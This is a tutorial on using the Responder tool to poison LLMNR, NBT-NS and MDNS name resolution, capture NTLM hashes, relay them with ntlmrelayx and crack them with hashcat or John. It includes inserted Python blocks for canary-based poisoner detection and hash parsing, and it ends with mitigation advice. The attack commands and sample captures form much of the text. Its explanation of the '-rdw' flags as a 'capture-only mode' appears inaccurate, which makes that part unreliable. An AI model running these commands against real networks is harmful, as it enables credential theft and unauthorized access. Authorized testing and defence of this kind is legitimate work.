Responder Usage Guide
Responder is a powerful tool used by penetration testers to capture NTLMv1/NTLMv2 hashes from network services through poisoning protocols such as LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and MDNS (Multicast DNS). It can also relay captured credentials to further exploit the network. This guide provides step-by-step instructions on how to install and use Responder for network analysis and exploitation.
1. Installing Responder
Responder is included in most penetration testing distributions, such as Kali Linux. If you don’t already have it, you can install it as follows:
Installation on Kali Linux or Ubuntu:
```shell
sudo apt update
sudo apt install responder
```

If using a system where Responder is not pre-installed, clone it from GitHub:

```shell
git clone https://github.com/SpiderLabs/Responder.git
cd Responder
```

2. Understanding Responder’s Capabilities
Responder works by listening on the network and poisoning name resolution requests from protocols like LLMNR, NBT-NS, and MDNS. When a user or machine tries to resolve a non-existent host, Responder responds with its IP, tricking the victim into authenticating and sending credentials that can be captured or relayed.
Common attack techniques Responder can perform:
- LLMNR/NBT-NS Poisoning: Captures authentication credentials through network response spoofing.
- SMB/HTTP Relay Attacks: Captures and relays authentication to another service for further exploitation.
- Capturing NTLMv1/NTLMv2 Hashes: Stores the captured credentials for later cracking.
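The name-resolution exchange described above, shown as an added example that is not part of Responder or this guide: a minimal LLMNR query/response codec in Python, plus the canary check defenders use to detect a poisoner on a segment. Because a canary name such as `canary-does-not-exist` has no legitimate owner anywhere on the network, any LLMNR answer for it is a poisoner. The canary name, the address 10.0.0.99 and the `sample_poisoned_response()` fixture are constructed here; `probe()` needs a live interface with multicast, while everything else runs offline.

```python
"""Added example (not part of Responder or this guide): a minimal LLMNR codec
and the canary check defenders use to detect poisoners on a segment."""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR multicast group, UDP port 5355
LLMNR_PORT = 5355
TYPE_A, CLASS_IN = 1, 1
FLAG_RESPONSE = 0x8000        # QR bit in the DNS-style header LLMNR reuses


def encode_name(name):
    """DNS label encoding: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("!B", len(raw)) + raw
    return out + b"\x00"


def decode_name(data, offset):
    """Decode a label sequence (handling compression pointers); return (name, next offset)."""
    labels, jumped, end = [], False, offset
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                      # compression pointer
            if not jumped:
                end = offset + 2
            jumped = True
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def build_query(name, txid=None):
    """LLMNR query for an A record: 12-byte header, one question, no answers."""
    txid = random.randint(0, 0xFFFF) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_response(data):
    """Return txid, whether QR is set, queried names and (name, ip) A answers."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        qname, offset = decode_name(data, offset)
        offset += 4                                    # skip QTYPE and QCLASS
        questions.append(qname)
    for _ in range(an):
        aname, offset = decode_name(data, offset)
        atype, _aclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata, offset = data[offset:offset + rdlen], offset + rdlen
        if atype == TYPE_A and rdlen == 4:
            answers.append((aname, socket.inet_ntoa(rdata)))
    return {"txid": txid, "is_response": bool(flags & FLAG_RESPONSE),
            "questions": questions, "answers": answers}


def sample_poisoned_response(query, ip):
    """Constructed test fixture: the shape of the answer a poisoner sends for
    our query (echoed question plus an A record pointing at `ip`)."""
    txid = struct.unpack("!H", query[:2])[0]
    name, _ = decode_name(query, 12)
    header = struct.pack("!HHHHHH", txid, FLAG_RESPONSE, 1, 1, 0, 0)
    answer = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, 30, 4) + socket.inet_aton(ip)
    return header + query[12:] + answer


def is_poisoned(query, response):
    """A canary name has no legitimate owner, so any matching answer means a poisoner."""
    expected_txid = struct.unpack("!H", query[:2])[0]
    canary, _ = decode_name(query, 12)
    r = parse_response(response)
    return (r["is_response"] and r["txid"] == expected_txid
            and any(n.lower() == canary.lower() for n, _ in r["answers"]))


def probe(canary="canary-does-not-exist", timeout=2.0):
    """Send one canary query on the live network; return [(sender_ip, answered_ip)].
    Needs a real interface with multicast; not exercised by the offline test."""
    query = build_query(canary)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (sender, _port) = sock.recvfrom(4096)
            if is_poisoned(query, data):
                hits.append((sender, parse_response(data)["answers"][0][1]))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    for sender, answered in probe():
        print(f"ALERT: {sender} answered the canary query with {answered}")
```

Run `probe()` periodically from a monitoring host on each VLAN and alert on any hit; the check is cheap because a correctly configured network never answers the canary. NBT-NS poisoning can be detected the same way on UDP 137, but its packet layout differs and is not covered by this codec.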
3. Basic Usage
Once installed, you can run Responder to begin listening on an interface and capture credentials. The basic command for starting Responder is:
```shell
sudo responder -I <interface>
```

- -I: This option tells Responder which network interface to listen on (e.g., eth0, wlan0).

Example:

```shell
sudo responder -I eth0
```

This will start Responder on the eth0 interface, and it will begin poisoning requests for LLMNR, NBT-NS, and MDNS by default.
4. Responder Configuration
Responder’s behavior can be configured using the Responder.conf file. You can specify which services to enable or disable based on your testing needs.
Default Configuration File Location:
```shell
nano /etc/responder/Responder.conf
```

Key services you can configure in Responder.conf:
- SMB: Captures SMB credentials (enabled by default).
- HTTP: Captures HTTP authentication.
- FTP/IMAP/LDAP/MSSQL/POP3: Captures credentials from other protocols.
- DNS Spoofing: Disabled by default; you can enable it to poison DNS responses.
Enable or disable specific services by setting them to On or Off in Responder.conf.
Example:
```ini
[Responder Core]
; If you want Responder to respond to these name services requests
; Set this to On or Off.
LLMNR = On
NBT-NS = On
MDNS = Off
DNS = Off
SMB = On
HTTP = On
HTTPS = On
```

5. Capturing Hashes with Responder
Once Responder is running, it will passively capture and log any credentials that are sent to it. When a victim attempts to resolve a host and Responder responds, the NTLM hash (or another form of credentials) will be captured.
Responder’s output will look like this for captured hashes:
```text
[SMB] NTLMv2-SSP Hash captured from <IP Address>
[SMB] Username: domain\user
[SMB] NTLMv2 Hash: <HASH>
```

The captured hashes are stored in a log file in the Responder directory (e.g., /usr/share/responder/logs/).

Example of starting Responder and capturing SMB hashes:

```shell
sudo responder -I eth0
```

Once you run this, Responder listens and captures authentication attempts over SMB, HTTP, and other protocols based on your configuration.
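An added example, not Responder's own code, that turns console output in the layout shown above into per-account records and checks that each hash has the NetNTLMv2 field layout (user::DOMAIN:server-challenge:NTProofStr:blob) before it is written to a file or listed in a finding. The point for the report is the summary: which accounts were exposed, and from which client hosts, so the owning team can reset them and fix the resolution failures that triggered the captures. The sample lines, IPs, account names and hex values are constructed placeholders.

```python
"""Added example (not part of Responder): turn Responder's console output into
per-account records and validate the NetNTLMv2 field layout before any hash
is written to a file for cracking or listed in a report."""
import re
from collections import defaultdict

# Constructed sample output following the layout this guide shows. Every IP,
# account name and hex value below is a fabricated placeholder.
SAMPLE_OUTPUT = """\
[SMB] NTLMv2-SSP Hash captured from 10.10.14.22
[SMB] Username: CORP\\alice
[SMB] NTLMv2 Hash: alice::CORP:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000ab
[HTTP] NTLMv2-SSP Hash captured from 10.10.14.22
[HTTP] Username: CORP\\alice
[HTTP] NTLMv2 Hash: alice::CORP:8877665544332211:99887766554433221100ffeeddccbbaa:0101000000000000cd
[SMB] NTLMv2-SSP Hash captured from 10.10.14.37
[SMB] Username: CORP\\svc-backup
[SMB] NTLMv2 Hash: svc-backup::CORP:0011223344556677:ffeeddccbbaa99887766554433221100:0101000000000000ef
[SMB] NTLMv2 Hash: broken::CORP:notahex
"""

CAPTURE_RE = re.compile(r"^\[(?P<proto>[A-Z0-9-]+)\] NTLMv2-SSP Hash captured from (?P<ip>\S+)")
HASH_RE = re.compile(r"^\[(?P<proto>[A-Z0-9-]+)\] NTLMv2 Hash: (?P<hash>\S+)")
# NetNTLMv2 as crackers consume it: user::DOMAIN:16-hex server challenge:
# 32-hex NTProofStr:hex blob (timestamp, client challenge, target info).
NETNTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-fA-F]{16})"
    r":(?P<proof>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$"
)


def parse_netntlmv2(hash_str):
    """Return the hash's fields, or None if the layout is not NetNTLMv2."""
    m = NETNTLMV2_RE.match(hash_str)
    return m.groupdict() if m else None


def parse_responder_output(text):
    """Return (records, rejected): parsed hashes with their capture context,
    and raw hash strings that did not validate."""
    records, rejected = [], []
    context = {"proto": None, "client_ip": None}
    for line in text.splitlines():
        cap = CAPTURE_RE.match(line)
        if cap:
            context = {"proto": cap["proto"], "client_ip": cap["ip"]}
            continue
        hit = HASH_RE.match(line)
        if not hit:
            continue
        fields = parse_netntlmv2(hit["hash"])
        if fields is None:
            rejected.append(hit["hash"])
            continue
        records.append({"proto": hit["proto"], "client_ip": context["client_ip"], **fields})
    return records, rejected


def summarize(records):
    """Map DOMAIN\\user to the sorted list of client IPs that exposed it."""
    exposed = defaultdict(set)
    for r in records:
        exposed[f"{r['domain']}\\{r['user']}"].add(r["client_ip"])
    return {account: sorted(ips) for account, ips in exposed.items()}


if __name__ == "__main__":
    recs, bad = parse_responder_output(SAMPLE_OUTPUT)
    for account, ips in summarize(recs).items():
        print(f"{account}: exposed from {', '.join(ips)}")
    print(f"{len(bad)} malformed hash line(s) skipped")
```

Lines that fail the layout check are reported rather than silently dropped, because a truncated or wrapped hash line is the usual reason a cracker rejects an input file.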
6. Relaying Credentials (SMB Relay)
In some cases, captured NTLM hashes can be relayed to other systems to perform actions such as gaining unauthorized access or escalating privileges. To relay NTLM credentials, you can combine Responder with NTLMRelayX (part of the Impacket suite).
Responder includes a built-in SMB relay attack option, but it’s generally more common to use NTLMRelayX for advanced relaying techniques.
Here’s a basic example using NTLMRelayX:
1. Start Responder in capture-only mode:

```shell
sudo responder -I eth0 -rdw
```

- -r: Disables answers for NetBIOS requests.
- -d: Disables answers for DHCP requests.
- -w: Disables answers for WINS requests.

2. Start NTLMRelayX to relay to another service:

```shell
sudo ntlmrelayx.py -tf targets.txt -smb2support
```

- -tf targets.txt: A list of target machines to which you want to relay credentials.
- -smb2support: Enables support for SMBv2.
Responder will capture NTLM credentials, and NTLMRelayX will relay them to the target specified in targets.txt.
7. Analyzing Results and Hash Cracking
After capturing NTLMv1/NTLMv2 hashes, the next step may be to crack them to recover the plaintext password. You can use tools like John the Ripper or Hashcat to attempt password cracking.
Cracking with Hashcat:
Save the captured hash in a file (e.g., hashes.txt) and use the following command:
```shell
hashcat -m 5600 hashes.txt /path/to/wordlist.txt
```

- -m 5600: Specifies NTLMv2 hash mode.
- hashes.txt: File containing the captured hashes.
- /path/to/wordlist.txt: Path to a wordlist for cracking (e.g., rockyou.txt).
Cracking with John the Ripper:
John the Ripper can also be used to crack captured hashes:
```shell
john --format=netntlmv2 hashes.txt --wordlist=/path/to/wordlist.txt
```

8. Best Practices and Recommendations
Mitigating Responder Attacks:

- Disable LLMNR and NBT-NS: The most effective way to mitigate Responder attacks is to disable LLMNR and NBT-NS on your network.
- Enforce SMB Signing: Enforcing SMB signing on your network helps prevent attackers from relaying SMB authentication traffic.
- Enable LDAP/SMB Signing: Sign LDAP and SMB communication to prevent relay attacks.

Disabling LLMNR on Windows:

1. Open Group Policy Editor (gpedit.msc).
2. Navigate to: Computer Configuration > Administrative Templates > Network > DNS Client.
3. Set Turn Off Multicast Name Resolution to Enabled.

Disabling NBT-NS:

1. Open Control Panel > Network and Sharing Center > Change adapter settings.
2. Right-click on your network interface, select Properties.
3. Uncheck Client for Microsoft Networks or manually disable NetBIOS over TCP/IP.
9. Conclusion
Responder is a versatile tool for capturing credentials via name resolution poisoning techniques. Properly configuring and running Responder can allow a penetration tester to gain valuable NTLM hashes, which can be relayed or cracked to gain unauthorized access to systems. To mitigate these types of attacks, organizations should disable LLMNR and NBT-NS and enforce SMB signing across their networks.
By understanding how to use Responder effectively, you can elevate your penetration testing activities and help secure networks against common misconfigurations.